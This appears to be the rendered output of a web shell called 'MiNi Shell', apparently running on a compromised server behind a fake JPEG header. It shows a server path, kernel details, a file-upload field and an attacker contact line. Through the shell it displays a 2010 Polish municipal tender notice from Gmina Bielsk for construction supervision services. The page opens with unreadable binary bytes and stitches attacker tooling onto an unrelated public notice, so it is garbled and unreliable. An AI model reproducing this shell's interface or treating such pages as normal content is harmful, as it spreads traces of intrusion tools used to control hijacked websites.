JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100115/13286-N-2010.html

<p class="kh_header"><b>Bielsk: Pełnienie funkcji inwestora zastępczego dla obsługi przedsięwzięć inwestycyjnych i remontowych rozpoczętych przez Gminę Bielsk w 2010 r</b><br>
<b>Numer ogłoszenia: 13286 - 2010; data zamieszczenia: 15.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bielsk , Plac Wolności 3A, 09-230 Bielsk, woj. mazowieckie, tel. 024 2615505, faks 024 2615189.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ugbielsk.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inwestora zastępczego dla obsługi przedsięwzięć inwestycyjnych i remontowych rozpoczętych przez Gminę Bielsk w 2010 r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest ; Pełnienie funkcji inwestora zastępczego dla obsługi przedsięwzięć inwestycyjnych i remontowych rozpoczętych przez Gminę Bielsk w 2010 r .
Wartość szacunkowa inwestycji ujętych w budżecie Gminy na 2010 rok  wynosi  8.605.000 zł.
Zakres obowiązków pełnienia funkcji Inwestora Zastępczego obejmuje :

1.Opracowanie specyfikacji istotnych warunków zamówienia na wybór wykonawcy robót.
2.W  przypadku   braku  przy  posiadanej   przez  Zamawiającego  dokumentacji   projektowej   kosztorysu nakładczego lub inwestorskiego - opracowanie wymienionych dokumentów.
3.prowadzenie korespondencji i występowanie, w imieniu Zamawiającego, z organami architektoniczno - budowlanymi i  nadzorem budowlanym, przekazywanie dokumentów do pozwolenia na użytkowanie
4.Udział oddelegowanego pracownika wykonawcy w komisji przetargowej na wybór wykonawcy robót - o ile zostanie powołany Zarządzeniem Wójta Gminy.
5.Przekazanie wykonawcy terenu budowy.
6.Zaopiniowanie harmonogramów rzeczowo-finansowych związanych z realizacją zadań.
7.Sprawowanie nadzoru inwestorskiego zadania w zakresie wymaganym przepisami ustawy z dnia 7 lipca 1994r Prawo budowlane ( j.t Dz. U z 2006 r. Nr 156 , poz.1118 z późn. zm)
8.Wszelkie decyzje inspektora nadzoru dotyczące wykonania przez wykonawcę zakresów dodatkowych robót nie objętych zamówieniem podstawowym, muszą uzyskać akceptację Zamawiającego.
9.Podejmowanie samodzielnych decyzji w zakresie udzielonych kompetencji i ponoszenie za nie pełnej odpowiedzialności we wszystkich sprawach związanych z nadzorem, zatwierdzaniem i oceną jakości postępu  wykonanych robót oraz wbudowanych materiałów, a w szczególności zapobiegania zastosowaniu materiałów wadliwych i nie dopuszczonych do obrotu i stosowania w budownictwie, ponadto w sprawach związanych z interpretacją dokumentacji projektowej, specyfikacji technicznej oraz dotyczących akceptacji wypełnienia warunków kontraktowych przez wykonawcę robót.
10.Potwierdzanie faktycznie wykonanych robót.
11.Zatwierdzenie faktur wystawianych przez wykonawcę w powiązaniu z wartością zawartą w umowie-harmonogramie rzeczowo - finansowym.
12.Organizowanie i prowadzenie narad technicznych dotyczących realizacji zadania z powiadomieniem Zamawiającego.
13.Sprawdzenie i odbiór robót budowlanych ulegających zakryciu lub zanikających.
14.Przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych.
15.Przeprowadzanie  w  okresie  trwania  niniejszej   umowy,   przy  udziale  Zamawiającego,  przeglądów gwarancyjnych i potwierdzenie usunięcia ewentualnie stwierdzonych wad.
16.Ponadto, w przypadku realizacji inwestycji przy udziale środków z Unii Europejskiej wykonawca będzie zobowiązany do:
a) na żądanie Zamawiającego sporządzenie dla Instytucji Pośredniczącej we wdrażaniu programów
    unijnych  lub innych instytucji finansujących zadanie (Projekt), pełnej dokumentacji wymaganej na
    podstawie zawartych umów finansowych.
b) przekazywania  Zamawiającemu  wszystkich  dokumentów  i  informacji  związanych z realizacją
    zadania,  których zażąda od Zamawiającego Instytucja Pośrednicząca w czasie obowiązywania
    niniejszej umowy w terminie przez niego określonym. Terminy te będą podawane nadzorowi
    inwestorskiemu w formie pisemnej,
c) uczestnictwa we wszystkich kontrolach przeprowadzanych przez Instytucję Pośredniczącą lub inne
    podmioty uprawnione do ich przeprowadzenia,
d) pomocy w rozliczeniu zadania.


Nomenklatura
Wspólny Słownik Zamówień (CPV)
71520000-9
Usługi nadzoru budowlanego
71541000-2
Usługi zarządzania projektem budowlanym 
71630000-3
Usługi kontroli i nadzoru technicznego


UWAGA: 
Zamawiający przewiduje możliwość wprowadzenia zmian w treści umowy w przypadku zaistnienia okoliczności niemożliwych do przewidzenia w dniu zawarcia umowy, a wszczególnosci w przypadku zaistnienia nastepujących okoliczności :
wystąpienia konieczności zmiany zakresu umowy spowodowanej  zmianą zakresu umowy z Wykonawcą robót.
Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty w sytuacji:
a) zmiany osób reprezentujących w przypadku zmiam organizacyjnych 
b) zmiany osób prowadzących nadzór inwestorski, pod warunkiem, że osoby te będą spełniały wymagania określone w postępowaniu przetargowym 

 2.  Zamawiający nie dopuszcza składania ofert częściowych, wariantowych i rozwiązań alternatywnych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.54.10.00-2, 71.63.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1.posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują  potencjałem technicznym i osobami zdolnymi do wy­konania zamówienia  tj.: 
a) dysponują osobami z uprawnieniami, co najmniej po 1 osobie na stanowiska inspektora nadzoru robót drogowych, sieci wodociągowych, sieci kanalizacyjnych, sieci instalacji i urządzeń elektrycznych, robót konstrukcyjno -  budowlanych wpisaną na listę członków Okręgowej Izby Inżynierów Budownictwa i  ubezpieczonych od odpowiedzialności cywilnej;
b) Wykonawca musi wykazać, że pełnił funkcję inspektora nadzoru nad robotami drogowymi, sieci wodociągowych, sieci kanalizacyjnych, sieci instalacji i urządzeń elektrycznych i robotami kubatorowymi w okresie ostatnich 3 lat (2007-2009) na minimum jednym zadaniu o zakresie robót finansowanych z kontraktów w oparciu o środki Unii Europejskiej  wraz z  dokumentami potwierdzającymi, że usługi te zostały wykonane należycie .
3.znajdują się w sytuacji ekonomicznej i finansowej za­pewniającej wykonanie zamówienia, 
4.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych.
Ocena spełnienia powyższych warunków dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń określonych w pkt. V. SIWZ stosując formułę spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać następujące dokumenty i oświadczenia:  
a)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
b)Oświadczenie o niezaleganiu z opłacaniem podatków i opłat w Urzędzie Skarbowym oraz o niezaleganiu z opłatami na rzecz Oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego- złożone pod odpowiedzialnością karną - art. 233 Kodeksu Karnego  lub oswiadczenie , że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenia na raty zaległych płatności lub wstrzymanie całości wykonania decyzji organu podatkowego 
c)oświadczenie wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy Prawo zamówień publicznych i spełnia warunki określone w art. 22 ust. 1 wskazanej ustawy  - wg załącznika nr 2.
d)Wykonawca musi wskazać osoby, które będą wykonywać zamówienie lub będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia w zakresie kierowania robotami budowlanymi w specjalności drogowej, instalacyjnej z zakresu sieci wodociągowych i kanalizacyjnych, instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych,  konstrukcyjno - budowlanych. - wg załącznika nr 5 do siwz.  Każdy z inspektorów poszczególnych branż musi wykazać się niezbędnymi uprawnieniami do nadzorowania robót, przynależnością do Izby Inżynierów Budownictwa ( aktualne zaświadczenie)
e)Wykaz wykonanych w okresie ostatnich trzech lat (2007-2009), a jeżeli okres prowadzenia dzialalności jest krótszy- w tym okresie, z podaniem ich wartości, przedmiotu, daty wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że usługi te zostały wykonane należycie - wg załącznika nr 4
f)Zamawiający żąda załączenia do oferty polisy lub innego dokumentu ubezpieczenia
potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie
prowadzonej działalności gospodarczej.

2.W przypadku składania oferty przez wykonawców wy­stępujących wspólnie w/w dokumenty składa każdy wykonawca.
3.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w:
1) pkt. V ppkt.1 lit. a),   SIWZ składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument w tym zakresie powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
nie orzeczono wobec niego zakazu ubiegania się o zamówienie. Dokument w tym zakresie powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, dokumentów, o których mowa w w/w pkt. 1) zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> ugbielsk.bip.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Bielsk, 09-230 Bielsk  Pl. Wolności 3A.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2010 godzina 09:00, miejsce: Gmina Bielsk, 09-230 Bielsk  Pl. Wolności 3A - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com